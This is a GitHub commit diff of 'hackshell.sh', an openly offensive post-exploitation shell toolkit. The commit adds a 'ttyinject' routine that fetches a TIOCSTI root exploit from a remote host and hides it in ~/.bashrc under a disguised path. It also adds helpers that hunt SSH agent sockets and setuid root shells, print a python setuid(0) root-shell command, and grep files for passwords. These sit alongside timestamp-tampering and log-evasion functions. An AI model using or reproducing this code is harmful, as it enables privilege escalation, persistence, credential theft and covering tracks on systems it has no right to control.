Skip to content

Commit 21769b4

Browse files
rootTHCrootTHC
committed
ttyinject & common
1 parent ace5dcc commit 21769b4

File tree

1 file changed

+94
-9
lines changed

1 file changed

+94
-9
lines changed

tools/hackshell.sh

Lines changed: 94 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -94,7 +94,7 @@ notime() {
9494

9595
[[ $# -le 1 ]] && { echo >&2 "notime <reference file> <cmd> ..."; return 255; }
9696
[[ ! -e "$ref" ]] && { echo >&2 "File not found: $ref"; return 255; }
97-
[ $UID -ne 0 ] && { HS_ERR "Need root"; return 255; }
97+
[ "$UID" -ne 0 ] && { HS_ERR "Need root"; return 255; }
9898

9999
shift 1
100100
now=$(date -Ins) || return
@@ -113,7 +113,8 @@ notime_cp() {
113113
local olddir_date
114114
local dir
115115

116-
[[ -z "$UID" ]] && UID="$(id -u)"
116+
[ -z "$UID" ] && UID="$(id -u 2>/dev/null)"
117+
[ -z "$USER" ] && USER="$(id -un 2>/dev/null)"
117118
[[ ! -f "$src" ]] && { echo >&2 "Not found: $src"; return 255; }
118119
if [[ -d "$dst" ]]; then
119120
dir="$dst"
@@ -332,6 +333,27 @@ zapme() {
332333
exec zapper -f -a"${1:--}" bash -il
333334
}
334335

336+
# Find writeable dirctory but without displaying sub-folders
337+
# Usage: wfind /
338+
# Usage: wfind /etc /var /usr
339+
wfind() {
340+
local arr dir
341+
local IFS
342+
343+
arr=("$@")
344+
while [[ ${#arr[@]} -gt 0 ]]; do
345+
dir=${arr[${#arr[@]}-1]}
346+
unset "arr[${#arr[@]}-1]"
347+
find "$dir" -maxdepth 1 -type d -writable -ls 2>/dev/null
348+
IFS=$'\n' arr+=($(find "$dir" -mindepth 1 -maxdepth 1 -type d ! -writable 2>/dev/null))
349+
done
350+
}
351+
352+
# Only output the 16 charges before and 32 chars after..
353+
hgrep() {
354+
grep -HEronasi ".{,16}${1:-password}.{,32}" .
355+
}
356+
335357
bin() {
336358
local arch="$(uname -m)"
337359
local os="$(uname -s)"
@@ -341,7 +363,10 @@ bin() {
341363

342364
[ -z "$os" ] && os="Linux"
343365
[ -z "$arch" ] && arch="x86_64"
344-
[ -n "$single" ] && unset is_showhelp
366+
[ -n "$single" ] && {
367+
FORCE=1 # implied. Always download even if systemwide exists
368+
unset is_showhelp
369+
}
345370
a="${arch}"
346371

347372
hs_mkxhome
@@ -457,6 +482,38 @@ _loot_homes() {
457482
done
458483
}
459484

485+
lootlight() {
486+
local str
487+
ls -al /tmp/ssh-* &>/dev/null && {
488+
echo -e "${CB}SSH-AGENT${CDY}${CF}"
489+
find /tmp -name 'agent.*' -ls
490+
echo -e "${CN}"
491+
}
492+
493+
[ "$UID" -ne 0 ] && {
494+
unset str
495+
str="$(find /var/tmp /tmp -maxdepth 2 -uid 0 -perm /u=s -ls 2>/dev/null)"
496+
[ -n "$str" ] && {
497+
echo -e "${CB}B00M-SHELL ${CDY}${CF}"
498+
echo "${str}"
499+
echo -en "${CN}"
500+
echo -e "${CDW}TIP: ${CDC}"'./b00m -p -c "exec python3 -c \"import os;os.setuid(0);os.setgid(0);os.execl('"'"'/bin/bash'"'"', '"'"'-bash'"'"')\""'"${CN}"
501+
}
502+
}
503+
504+
unset str
505+
if command -v pgrep >/dev/null; then
506+
str="$(pgrep -x 'ssh' -a)"
507+
elif command -v ps >/dev/null; then
508+
str="$(ps alx | grep "ssh " | grep -v grep)"
509+
fi
510+
[ -n "$str" ] && {
511+
echo -e "${CB}SSH-Hijack (reptyr)${CDY}${CF}"
512+
echo "${str}"
513+
echo -e "${CN}"
514+
}
515+
}
516+
460517
# Someone shall implement a sub-set from TeamTNT's tricks (use
461518
# noseyparker for cpu/time-intesive looting). TeamTNT's infos:
462519
# https://malware.news/t/cloudy-with-a-chance-of-credentials-aws-targeting-cred-stealer-expands-to-azure-gcp/71346
@@ -512,11 +569,7 @@ loot() {
512569
_loot_homes "AWS S3" ".boto"
513570
_loot_homes "NETRC" ".netrc"
514571

515-
ls -al /tmp/ssh-* &>/dev/null && {
516-
echo -e "${CB}SSH AGENT${CDY}${CF}"
517-
find /tmp -name 'agent.*' -ls
518-
echo -e "${CN}"
519-
}
572+
lootlight
520573
}
521574

522575
ws() {
@@ -535,6 +588,29 @@ destruct() {
535588
export HOME="${_HS_HOME_ORIG}"
536589
}
537590

591+
ttyinject() {
592+
local is_mkdir
593+
ttyinject_clean() {
594+
[ -e "${_HS_HOME_ORIG}/.config/procps/reset" ] && rm -f "${_HS_HOME_ORIG}/.config/procps/reset"
595+
[ -n "$is_mkdir" ] && rmdir "${_HS_HOME_ORIG}/.config/procps"
596+
}
597+
598+
[ "$UID" -eq 0 ] && { HS_ERR "You are already root"; return; }
599+
[ ! -d "${_HS_HOME_ORIG}/.config/procps" ] && { mkdir -p "${_HS_HOME_ORIG}/.config/procps" || return; is_mkdir=1; }
600+
601+
[ ! -f "${_HS_HOME_ORIG}/.config/procps/reset" ] && {
602+
dl "https://github.com/hackerschoice/ttyinject/releases/download/v1.1/ttyinject-linux-$(uname -m)" >"${_HS_HOME_ORIG}/.config/procps/reset" || return
603+
}
604+
chmod 755 "${_HS_HOME_ORIG}/.config/procps/reset" || { ttyinject_clean; return; }
605+
606+
TTY_TEST=1 "${_HS_HOME_ORIG}/.config/procps/reset" || { ttyinject_clean; HS_WARN "System is not vulnerable to TIOCSTI stuffing."; return; }
607+
[ -f "${_HS_HOME_ORIG}/.bashrc" ] && ! grep -qFm1 'procps/reset' "${_HS_HOME_ORIG}/.bashrc" 2>/dev/null && {
608+
echo "$(head -n1 "${_HS_HOME_ORIG}/.bashrc")"$'\n'"~/.config/procps/reset 2>/dev/null"$'\n'"$(tail -n +2 "${_HS_HOME_ORIG}/.bashrc")" >~/.bashrc
609+
}
610+
echo -e "Wait for ${CDY}/var/tmp/.socket${CN} to appear and then do:
611+
${CDC}"'/var/tmp/.socket -p -c "exec python3 -c \"import os;os.setuid(0);os.setgid(0);os.execl('"'"'/bin/bash'"'"', '"'"'-bash'"'"')\""'"${CN}"
612+
}
613+
538614
hs_exit() {
539615
cd /tmp || cd /dev/shm || cd /
540616
[ "${#_hs_bounce_src[@]}" -gt 0 ] && HS_WARN "Bounce still set in iptables. Type ${CDC}unbounce${CN} to stop the forward."
@@ -644,7 +720,7 @@ hs_init_alias() {
644720
alias cd..='cd ..'
645721
alias ..='cd ..'
646722

647-
command -v curl >/dev/null && curl --help curl | grep -i proto-default && alias curl="--proto-default https"
723+
command -v curl >/dev/null && curl --help | grep -i proto-default && alias curl="curl --proto-default https"
648724
}
649725

650726
hs_init_shell() {
@@ -689,7 +765,10 @@ ${CDC} transfer ~/.ssh ${CDM}Upload a file or directory ${
689765
${CDC} shred file ${CDM}Securely delete a file
690766
${CDC} notime <file> rm -f foo.dat ${CDM}Execute a command at the <file>'s ctime & mtime
691767
${CDC} notime_cp <src> <dst> ${CDM}Copy file. Keep birth-time, ctime, mtime & atime
768+
${CDC} ttyinject ${CDM}Become root when root switches to ${USER:-this user}
769+
${CDC} wfind <dir> [<dir> ...] ${CDM}Find writeable directories
692770
${CDC} find_subdomain .foobar.com ${CDM}Search files for sub-domain
771+
${CDC} hgrep <string> ${CDM}Grep for pattern, output for humans ${CN}${CF}[hgrep password]
693772
${CDC} crt foobar.com ${CDM}Query crt.sh for all sub-domains
694773
${CDC} rdns 1.2.3.4 ${CDM}Reverse DNS from multiple public databases
695774
${CDC} scan <port> [<IP or file> ...] ${CDM}TCP Scan a port + IP
@@ -698,15 +777,18 @@ ${CDC} np <directory> ${CDM}Display secrets with NoseyPar
698777
${CDC} loot ${CDM}Display common secrets
699778
${CDC} ws ${CDM}WhatServer - display server's essentials
700779
${CDC} bin ${CDM}Download useful static binaries
780+
${CDC} lt, lss, psg, lsg, ... ${CDM}Common useful shotcuts
701781
${CDC} xhelp ${CDM}This help"
702782
echo -e "${CN}"
703783
}
704784

705785

786+
706787
### Programm
707788
hs_init "$0"
708789
hs_init_alias
709790
hs_init_shell
791+
710792
xhelp
711793

712794
### Finishing
@@ -719,6 +801,9 @@ echo -e ">>> Tweaking environment variables to log less ${CN}[${CDG}DONE${CN
719801
echo -e ">>> Creating aliases to make commands log less ${CN}[${CDG}DONE${CN}]"
720802
echo -e ">>> ${CG}Setup complete. ${CF}${str}${CN}"
721803

804+
### Check for obvious loots
805+
lootlight
806+
722807
# unset all functions that are no longer needed.
723808
unset -f hs_init hs_init_alias hs_init_dl hs_init_shell
724809
unset BIN str SSH_CONNECTION SSH_CLIENT

0 commit comments

Comments
 (0)